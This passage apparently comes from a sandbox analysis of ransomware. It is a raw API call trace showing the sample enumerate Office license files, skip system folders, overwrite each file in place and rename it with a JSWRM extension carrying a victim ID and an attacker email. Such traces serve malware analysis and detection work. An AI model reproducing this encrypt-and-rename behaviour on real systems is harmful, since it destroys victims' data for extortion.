RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0109.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_MAK-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0109.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0109.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_MAK-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x2411c8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0109.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0109.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0109.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0109.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0109.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_mak-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.520] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11586) returned 1 [0109.520] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0109.520] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0109.522] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.522] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0109.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.522] CloseHandle (hObject=0x45c) returned 1 [0109.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0109.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0109.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0109.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0109.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0109.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0109.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.523] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_mak-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_MAK-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_mak-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0109.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0109.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0109.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0109.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0109.524] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaa41f69, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeaa41f69, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeac7e2dd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ddb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusVL_MAK-ul-phn.xrm-ms", cAlternateFileName="PR6C54~1.XRM")) returned 1 [0109.524] lstrcmpiW (lpString1="ProPlusVL_MAK-ul-phn.xrm-ms", lpString2=".") returned 1 [0109.524] lstrcmpiW (lpString1="ProPlusVL_MAK-ul-phn.xrm-ms", lpString2="..") returned 1 [0109.524] lstrcmpiW (lpString1="ProPlusVL_MAK-ul-phn.xrm-ms", lpString2="...") returned 1 [0109.524] lstrcmpiW (lpString1="ProPlusVL_MAK-ul-phn.xrm-ms", lpString2="windows") returned -1 [0109.524] lstrcmpiW (lpString1="ProPlusVL_MAK-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0109.524] lstrcmpiW (lpString1="ProPlusVL_MAK-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0109.525] lstrcmpiW (lpString1="ProPlusVL_MAK-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0109.525] lstrcmpiW (lpString1="ProPlusVL_MAK-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.525] lstrcmpiW (lpString1="ProPlusVL_MAK-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0109.525] lstrcmpiW (lpString1="ProPlusVL_MAK-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0109.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0109.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_MAK-ul-phn.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0109.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0109.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_MAK-ul-phn.xrm-ms", cchWideChar=27, lpMultiByteStr=0x240f98, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0109.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0109.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_MAK-ul-phn.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0109.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0109.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_MAK-ul-phn.xrm-ms", cchWideChar=27, lpMultiByteStr=0x2413a8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0109.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0109.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0109.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0109.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_mak-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.526] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19931) returned 1 [0109.526] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dd0) returned 0x24c1d0 [0109.526] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dd0, lpOverlapped=0x0) returned 1 [0109.529] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.529] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dd0, lpOverlapped=0x0) returned 1 [0109.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.530] CloseHandle (hObject=0x45c) returned 1 [0109.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0109.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0109.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0109.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0109.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0109.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0109.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.530] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_mak-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_MAK-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_mak-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0109.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0109.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0109.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0109.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0109.531] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea9a962c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea9a962c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeab00b45, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x512a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PublisherR_Grace-ppd.xrm-ms", cAlternateFileName="PU4431~1.XRM")) returned 1 [0109.531] lstrcmpiW (lpString1="PublisherR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0109.531] lstrcmpiW (lpString1="PublisherR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0109.531] lstrcmpiW (lpString1="PublisherR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0109.531] lstrcmpiW (lpString1="PublisherR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0109.531] lstrcmpiW (lpString1="PublisherR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0109.531] lstrcmpiW (lpString1="PublisherR_Grace-ppd.xrm-ms", lpString2="perflogs") returned 1 [0109.531] lstrcmpiW (lpString1="PublisherR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0109.531] lstrcmpiW (lpString1="PublisherR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.531] lstrcmpiW (lpString1="PublisherR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0109.531] lstrcmpiW (lpString1="PublisherR_Grace-ppd.xrm-ms", lpString2="msocache") returned 1 [0109.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0109.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Grace-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0109.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0109.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Grace-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241268, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0109.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0109.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0109.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Grace-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0109.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0109.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Grace-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x240fe8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0109.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0109.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0109.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0109.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0109.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.532] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20778) returned 1 [0109.532] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5120) returned 0x24c1d0 [0109.533] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5120, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5120, lpOverlapped=0x0) returned 1 [0109.535] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.535] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5120, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5120, lpOverlapped=0x0) returned 1 [0109.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.535] CloseHandle (hObject=0x45c) returned 1 [0109.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0109.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0109.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0109.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0109.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0109.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0109.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.536] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0109.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0109.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0109.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0109.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0109.537] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea936f19, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea936f19, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeaa41f69, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d59, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PublisherR_Grace-ul-oob.xrm-ms", cAlternateFileName="PUBLIS~4.XRM")) returned 1 [0109.537] lstrcmpiW (lpString1="PublisherR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0109.537] lstrcmpiW (lpString1="PublisherR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0109.537] lstrcmpiW (lpString1="PublisherR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0109.537] lstrcmpiW (lpString1="PublisherR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0109.537] lstrcmpiW (lpString1="PublisherR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0109.537] lstrcmpiW (lpString1="PublisherR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0109.537] lstrcmpiW (lpString1="PublisherR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0109.537] lstrcmpiW (lpString1="PublisherR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.537] lstrcmpiW (lpString1="PublisherR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0109.537] lstrcmpiW (lpString1="PublisherR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0109.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Grace-ul-oob.xrm-ms", 